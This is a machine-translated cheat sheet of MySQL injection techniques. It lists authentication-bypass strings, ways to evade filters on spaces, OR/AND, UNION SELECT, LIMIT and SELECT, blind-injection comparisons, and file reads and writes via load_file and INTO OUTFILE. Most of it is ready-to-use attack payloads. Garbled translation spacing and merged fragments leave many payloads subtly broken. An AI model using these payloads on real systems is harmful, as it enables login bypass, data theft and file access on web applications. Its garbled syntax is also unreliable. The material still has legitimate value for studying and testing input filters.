MySQL INJECTION SKILLS

MySQL INJECTION SKILLS

0x00, Introduction

You can also refer to the mysql injection Popular Science: http://drops.wooyun.org/tips/123

Many things are the same, but some tips are really useful.

All of the following tips apply only to mysql, because it is too flexible

0x01 MYSQl flexible syntax

1. MySQL syntax and Authentication Bypass

Annotator:

#, -- X (X is any character)/* (MySQL-5.1); % 00 ''or 1 = 1; % 00 'or 1 = 1 union select 1, 2 ''' or 1 = 1 #'/*! 50000or */1 = 1 ---// when the version number is 5.1.38, it must be less than 50138 '/*! Or */1 = 1 ---

Prefix:

Arbitrary mixing + -~ !

'or --+2=- -!!!'2

After the test, we found that and/or can be followed by an even number! ,~ It can replace spaces or be used in combination (different rules after mixing). spaces before and/or can be omitted.

'or- -!!!1=1；

OPERATOR:

^, =, !=, %, /, *, &, &&, |, ||, <, >, <<, >>, >=, <=, <>, <=>, XOR,DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN,……'or 1 rlike '1

Space replacement: % 20, % 09, % 0a, % 0b, % 0c, % 0d, % a0

You can also insert parentheses, prefixes, operators, and quotation marks.

'or+(1)sounds/**/like"1"--%a0-

String format

'Or "a" = 'A' or 'A' = n' a' // unicode' or 'A' = B '1100001' // binary 'or 'A' = _ binary '200' // The test in 5.5.41 is invalid. 'or 'A' = x' 61' // hexadecimal

2. Some commonly used MySQL gadgets

Constant: true, false, null, \ N, current_timestamp ....

Variable: @ myvar: = 1

System variable: @ version, @ datadir ....

Common functions: version (), pi (), pow (), char (), substring ()....

3. MySQL type conversion

'Or 1 = true # true = 1, false = 0' or 1 # true' or version () = 5.5 #5.5.41-log' or round (pi (), 1) + true + 0.4 = version () #3.1 + 1 + 1 + 0.4 select * from users where 'a' = 'B' = 'C' select * from users where ('A' = 'B ') = 'C' select * from users where (false) = 'C' select * from users where (0) = 'C' select * from users where (0) = 0 select * from users where trueselect * from users

The preceding statements have the same effect.

4. Authentication Bypass

Bypass statement: '='

Select data from users where name = "=" select data from users where flase = "select data from users where 0 = 0

Bypass statement :'-'

Select data from users where name = ''-'' select data from users where name = 0-0select data from users where 0 = 00x02 keyword Filtering

Space

Filter code/\ s/

%20, %09, %0a, %0b, %0c, %0d, %a0

Keyword OR, AND

Filter code/\ sor \ s/I,/\ sand \ s/I

'||1='1     #or'=''&&1='1     #and

Keyword: union select

Filter code/union \ s + select/I

'And (true) like (false) union (select (pass) from (users )) # 'Union [all | distinct] select pass from users # 'Union % a0select pass from users # 'Union /*! Select */pass from users #/vuln. php? Id = 1 union/* & sort = */select pass from users ---

If union is filtered separately, blind injection is used to obtain data.

'and(select pass from users limit 1)='secret

Obtain a single value through a subquery for comparison

Keyword limit

Filter code/limit/I

'And (select pass from users where id = 1) = 'A' and (select pass from users group by id having id = 1) = 'A' and length (select pass from users having substr (pass, 1,1) = 'A '))

Keyword having

Filter code/having/I

'and(select substr(group_concat(pass),1,1)from users)='a

Keyword select... from

Filter code/SELECT \ s + [A-Za-z.] + \ s + FROM/I

Select [all | distinct] pass from usersselect 'table _ name' from 'information _ scheme '. 'table' select pass as alias from usersselect pass aliasalias from usersselect pass 'Alias alias' from usersselect + pass % a0from (users)

Keyword select

Filter code/select/I

1. Permission to read files

'And substr (load_file ('file'), locate ('documentroot', (load_file ('file') + length ('documentroot'), 10) = 'A' = ''into outfile'/var/www/dump.txt 2 get the column name

'And column name is not null # 'Procedure analyze ()#

Use substr for filtering

'and substr(pass,1,1)='a

Keywords: select, and ,&

'0 #

Select data from users where name = ''-0 # int typecastselect data from users where name = 0 # int typecastselect data from users where 0 = 0 # true

'-1 #

select data from users where 0 = -1 # false

Select true or false by using conditional judgment

Ifnull (nullif (), case when, if () '-if (name = 'admin', 1, 0 )#

Use the nested condition '-if (

if(name='Admin',1,0), // conditionif(substr(pass,1,1)='a',1,0) // if true,0)# // if false        

0x03 function Filtering

Construct string-related functions

Unhex char hex ascii ord substr substring mid pad left right insert 'and substr (data,) = 'A' #' and substr (data) = 0x61 #0x6162 'and substr (data, 6162) = unhex (61) # unhex ()' and substr (data,) = char (97) # char () 'and hex (substr (data,) = 61 #' and ascii (substr (data )) = 97 # 'and ord (substr (data, 1, 1) = 97 #

Use conv for hexadecimal conversion

'And substr (data,) = lower (conv (10, 10, 36) # 'A' and substr (data,) = lower (conv (11, 10, 36 )) # 'B' and substr (data,) = lower (conv (, 36) # 'Z'

Use functions to guess data

' and substr(data,1,1) = 'a'#' and substring(data,1,1) = 'a'#' and mid(data,1,1) = 'a'#

Do not use commas to obtain

' and substr(data from 1 for 1) = 'a'#

You can also use functions that are rare to try to bypass.

Lpad (data, 1, space (1) // lpad ('hi', 4 ,'? ') = '?? Hi 'rpad (data, 1, space (1) // rpad ('hi', 4 ,'? ') = 'Hi ?? 'Left (data, 1) reverse (right (reverse (data), 1) insert (version (), 1, 0, space (0), 2,222, space (0 ))

Some functions have similar search and matching functions.

'-If (locate ('F', data),) #'-if (locate ('fo', data) # '-if (locate ('foo', data), 1, 0) # instr (), position ()

Use functions to cut strings

Length (trim (leading 'A' FROM data) # length will be shorterlength (replace (data, 'A', '') # length will be shorter

Both methods have the same effect.

0x04 main usage during injection

1 control flow operation (select, case, if (),...) 1 Comparison operation (=, like, mod (),...) 1 string (mid (), left (), rpad (),...) 1 string generation (0x61, hex (), conv ())

Use conv ([10-36],) to express all characters

1 control flow operation (select, case, if (),...) 1 Comparison operation (=, like, mod (),...) 1 string (mid (), left (), rpad (),...) Generate 1 string (0x61, hex (), conv () false! Pi () 0 ceil (pi () * pi () 10 A ceil (pi () + pi () * pi () 20 Ktrue !! Pi () 1 ceil (pi () * pi () + true 11 B ceil (pi () * version ()) 21 Ltrue + true 2 ceil (pi () + version () 12 C ceil (pi () * ceil (pi () + pi ())) 22 Mfloor (pi () 3 floor (pi () * pi () + pi () 13 D ceil (pi () + ceil (pi ())) * pi () 23 Nceil (pi () 4 ceil (pi () * pi () + pi () 14 E ceil (pi ()) * ceil (version () 24 Ofloor (version () 5 ceil (pi () * pi () + version () 15 F floor (pi () * (version () + pi () 25 Pceil (version () 6 floor (pi () * version () 16G floor (version () * version () 26 Qceil (pi () + pi () 7 ceil (pi () * version () 17 H ceil (version () * version ()) 27 Rfloor (version () + pi () 8 ceil (pi () * version () + true 18 I ceil (pi () * pi () -pi () 28 Sfloor (pi () * pi () 9 floor (pi () + pi () * pi () 19 J floor (pi () * pi () * floor (pi () 29 T